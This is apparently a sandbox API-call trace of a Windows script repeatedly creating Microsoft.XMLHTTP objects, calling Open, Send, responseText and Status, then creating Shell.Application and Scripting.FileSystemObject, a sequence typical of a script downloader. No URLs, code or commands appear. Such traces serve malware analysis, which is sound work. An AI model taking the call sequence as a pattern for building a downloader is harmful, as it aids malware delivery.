	[0408.851] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7200) returned 0x0
	[0408.851] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7200) returned 0x3
	[0408.851] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0408.851] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0408.851] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0408.851] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0408.851] SysStringLen (param_1=0x0) returned 0x0
	[0408.851] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0408.851] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0408.851] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0408.851] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0408.851] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c72b8) returned 0x0
	[0408.851] ??2@YAPEAX_K@Z () returned 0x62f330
	[0408.851] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c72b8, pUnkSite=0x62f330) 
	[0408.851] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0408.851] XMLHTTPRequest:IUnknown:Release (This=0x49c72b8) returned 0x0
	[0408.851] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0408.851] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0408.852] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0408.852] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0408.852] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0408.852] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0408.852] SysStringLen (param_1=0x0) returned 0x0
	[0408.852] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0408.852] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0408.852] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7560) returned 0x0
	[0408.852] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0408.852] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0408.852] ??2@YAPEAX_K@Z () returned 0x62f310
	[0408.852] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f310) 
	[0408.852] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0408.852] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0408.852] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7560) returned 0x0
	[0408.852] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7560) returned 0x3
	[0408.853] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0408.853] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0408.853] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0408.853] longjmp () 
	[0408.853] longjmp () 
	[0408.853] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0408.853] SysStringLen (param_1=0x0) returned 0x0
	[0408.853] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0408.853] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0408.853] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7290) returned 0x0
	[0408.853] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0408.853] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7290, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c72f8) returned 0x0
	[0408.853] ??2@YAPEAX_K@Z () returned 0x62f330
	[0408.853] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c72f8, pUnkSite=0x62f330) 
	[0408.853] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0408.854] XMLHTTPRequest:IUnknown:Release (This=0x49c72f8) returned 0x0
	[0408.854] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7290, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7290) returned 0x0
	[0408.854] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7290) returned 0x3
	[0408.854] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7290, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0408.854] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7290, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0408.854] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7290, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0408.854] longjmp () 
	[0408.854] longjmp () 
	[0408.854] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0408.854] SysStringLen (param_1=0x0) returned 0x0
	[0408.854] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0408.854] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0408.854] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0408.855] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0408.855] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5ba8) returned 0x0
	[0408.855] ??2@YAPEAX_K@Z () returned 0x62f310
	[0408.855] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5ba8, pUnkSite=0x62f310) 
	[0408.855] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0408.855] XMLHTTPRequest:IUnknown:Release (This=0x49c5ba8) returned 0x0
	[0408.855] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0408.855] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0408.855] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0408.855] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0408.855] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0408.855] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0408.855] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0408.855] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0409.286] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0409.286] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0409.286] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0409.286] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0409.286] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0409.286] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0409.287] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0409.287] SysStringLen (param_1=0x0) returned 0x0
	[0409.287] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0409.287] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0409.287] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0409.287] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0409.287] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0409.287] ??2@YAPEAX_K@Z () returned 0x62f350
	[0409.287] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0409.287] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0409.287] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0409.287] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0409.287] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0409.287] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0409.287] SysStringLen (param_1=0x0) returned 0x0
	[0409.287] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0409.289] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0409.289] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0409.289] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0409.289] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
